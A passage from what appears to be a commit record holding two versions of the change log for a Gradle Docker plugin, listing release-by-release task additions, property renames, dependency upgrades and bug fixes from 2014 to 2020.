- {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have all its keys\/values resolved to java strings. - {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDE's. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars` which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. It's `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fallback to checking if container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fallback to the just created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow user to define a list of successful exit codes the exec is allowed to return and will fail if not in list. Default behavior is to do no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running containers logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time issue stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during gradles config-phase. - {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` than fallback to using generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump verison of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor or jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standatds - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump verison of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump verison of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump verison of docker-java to 3.0.11 - {uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows to inspect exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`'s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`, instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`'s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump vof docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per singled ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups as well default to alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on `DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix when not checking if parent dir already exists before creating with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overriden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - {uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` call a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - v[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2014)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly add user-based instructions to Dockfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","old_contents":"== Change Log\n\n[discrete]\n=== v6.5.0 (July 3, 2020)\n\n* Default to Docker Hub when no registry is explicitly given - {uri-github}\/issues\/942[Issue 942]\n* Upgrade of Docker Java library to version 3.2.5 and default to communication transport to Apache HttpClient 5 - {uri-github}\/issues\/942[Issue 942]\n\n[discrete]\n=== v6.4.0 (March 23, 2020)\n\n* Keep the network name and network ID separate in `DockerCreateNetwork` - {uri-github}\/issues\/920[Issue 920]\n* Upgrade ASM dependency to Java 13\/14-compatible version - {uri-github}\/issues\/929[Issue 929]\n\n[discrete]\n=== v6.3.0 (March 14, 2020)\n\n* Retrieve all known credentials for `DockerBuildImage` custom task - {uri-github}\/pull\/913[PR 913]\n* Add support for setting custom workingDir in `DockerExecContainer` task - {uri-github}\/pull\/927[PR 927]\n\n[discrete]\n=== v6.2.0 (March 10, 2020)\n\n* Upgrade Docker Java to next minor version - {uri-github}\/pull\/925[PR 925]\n* Expose property for providing extra hosts - {uri-github}\/pull\/926[PR 926]\n\n[discrete]\n=== v6.1.4 (February 23, 2020)\n\n* Nested property `FileInstruction.getFile()` renders warning as it doesn't provide input or output annotation - {uri-github}\/issues\/919[Issue 919]\n\n[discrete]\n=== v6.1.3 (January 26, 2020)\n\n* Credentials helper JSON output parsing falls back to default if it cannot be read properly - {uri-github}\/pull\/909[PR 909]\n\n[discrete]\n=== v6.1.2 (January 14, 2020)\n\n* Decode base64 auth header - {uri-github}\/pull\/902[PR 902]\n\n[discrete]\n=== v6.1.1 (December 12, 2019)\n\n* Add debug logging in Docker configuration parsing - {uri-github}\/pull\/898[PR 898]\n\n[discrete]\n=== v6.1.0 (December 12, 2019)\n\n* Allow configuring the main class name for convention plugins - {uri-github}\/pull\/892[PR 892]\n* Do not parse config file if it doesn't exist - {uri-github}\/issues\/887[Issue 887]\n\n[discrete]\n=== v6.0.0 (November 16, 2019)\n\n* **Breaking Change!** Multi-tag support for push operation and convention plugins - {uri-github}\/pull\/867[PR 867]\n* **Breaking Change!** Renamed property `tags` to `images` for extensions `DockerJavaApplication` and `DockerSpringBootApplication`.\n* **Breaking Change!** Renamed property `tag` to `image` for custom tasks `DockerBuildImage`, `DockerCommitImage`, `DockerPullImage`, `DockerSaveImage`, `DockerListImages`,`DockerCreateContainer`.\n* **Breaking Change!** Removal of method `DockerPullImage.getImageId()`. Use `DockerPullImage.getImage()` instead.\n* **Breaking Change!** Host-related configuration properties in `DockerCreateContainer` have been moved to nested property for better maintainability - {uri-github}\/pull\/873[PR 873]\n* Add properties `ipcMode` and `sysctls` to `DockerCreateContainer` - {uri-github}\/pull\/862[PR 862]\n* Gradle 6.0 compatibility fixes - {uri-github}\/pull\/869[PR 869]\n* Improve DSL for configuring registry credentials for custom tasks - {uri-github}\/pull\/879[PR 879]\n* Plugin resolves and uses Docker credential helper - {uri-github}\/pull\/865[PR 865]\n* Upgrade of Docker Java library to version 3.1.5\n\n[discrete]\n=== v5.3.0 (October 30, 2019)\n\n* Expose project-prop\/sys-prop\/env-var to optionally use netty-exec-cmd-factory - {uri-github}\/pull\/876[PR 876]\n\n[discrete]\n=== v5.2.0 (October 5, 2019)\n\n* **Potentially Breaking Change!** Remove duplicated code in convention plugins - {uri-github}\/pull\/864[PR 864]\n* Restore compatibility with Gradle 5.1 as runtime version - {uri-github}\/issue\/866[Issue 866]\n\n[discrete]\n=== v5.1.0 (September 18, 2019)\n\n* **Potentially Breaking Change!** Remove remaining use of Application Plugin in convention plugins - {uri-github}\/pull\/852[PR 852]\n\n[discrete]\n=== v5.0.0 (August 13, 2019)\n\n* **Breaking Change!** Remove exec\/cmd hooks in Docker application plugin - {uri-github}\/pull\/806[PR 806]\n* **Breaking Change!** API cleanup of Dockerfile task - {uri-github}\/pull\/812[PR 812]\n* **Breaking Change!** Removed `ItemJoiner` from public API - {uri-github}\/pull\/836[PR 836]\n* Respect symlinks in build context - {uri-github}\/issue\/837[Issue 837]\n\n[discrete]\n=== v4.10.0 (June 12, 2019)\n\n* Expose `target` property for BuildImageTask - {uri-github}\/pull\/813[PR 813]\n* Remove final from DockerBuildImage.labels property - {uri-github}\/pull\/823[PR 823]\n* Always set imageId within DockerBuildImage on success - {uri-github}\/pull\/819[PR 819]\n\n[discrete]\n=== v4.9.0 (May 25, 2019)\n\n* Avoid memory leakage by replacing addShutdownHook with Gradle.buildFinished - {uri-github}\/pull\/810[PR 810]\n* `DockerBuildImage` will print whole lines by collecting output and waiting for newline - {uri-github}\/pull\/799[PR 799]\n* `DockerBuildImage` reinstated ImageId output file and check in Docker registry - {uri-github}\/pull\/807[PR 807]\n\n[discrete]\n=== v4.8.1 (May 11, 2019)\n\n* Introduce `maintainer` property to extension of Spring Boot application plugin - {uri-github}\/issues\/779[Issue 779]\n* **Breaking Change!** Removed `RepositoriesFallbackPlugin` that was applied automatically - {uri-github}\/issues\/794[Issue 794]\n* **Breaking Change!** The Docker client in `AbstractDockerRemoteApiTask` is not inject into the method `runRemoteCommand` anymore - {uri-github}\/issues\/802[Issue 802]\n\n[discrete]\n=== v4.8.0 (April 22, 2019)\n\n* Expose extension property for configuring JVM arguments - {uri-github}\/pull\/790[PR 790]\n\n[discrete]\n=== v4.7.1 (April 13, 2019)\n\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature] and has been replaced with `waitTime`.\n\n[discrete]\n=== v4.7.0 (April 9, 2019)\n\n* Tasks created by convention plugins should assign a task group - {uri-github}\/issues\/768[Issue 768]\n* Main class detection should work with a Kotlin-based application - {uri-github}\/issues\/766[Issue 766]\n* Fix gradle `5.x` deprecation warnings - {uri-github}\/issues\/782[Issue 782]\n* Bump `docker-java` to `3.1.2` - {uri-github}\/issues\/787[Issue 787]\n\n[discrete]\n=== v4.6.2 (March 9, 2019)\n\n* Add shaded JAF dependency to simplify usage of plugin with Java 11 - {uri-github}\/issues\/764[Issue 764]\n\n[discrete]\n=== v4.6.1 (March 6, 2019)\n\n* Fix setting binds in `DockerCreateContainer` task - {uri-github}\/issues\/758[Issue 758]\n\n[discrete]\n=== v4.6.0 (March 3, 2019)\n\n* **Breaking Change!** Plugin declares and uses Docker Java as runtime library - {uri-github}\/pull\/751[PR 751]\n* **Breaking Change!** Custom task `DockerClient` has been renamed to `DockerOperation` to avoid conflicting Docker Java class name\n* Shade plugin dependencies except Docker Java - {uri-github}\/pull\/755[PR 755]\n\n[discrete]\n=== v4.5.0 (February 19, 2019)\n\n* `Dockerfile.FileInstruction` does not use flags if `Dockerfile.File` is passed in using a `Provider` - {uri-github}\/pull\/753[PR 753]\n* Inline main class finder and avoid explicit dependency on Spring Boot - {uri-github}\/pull\/752[PR 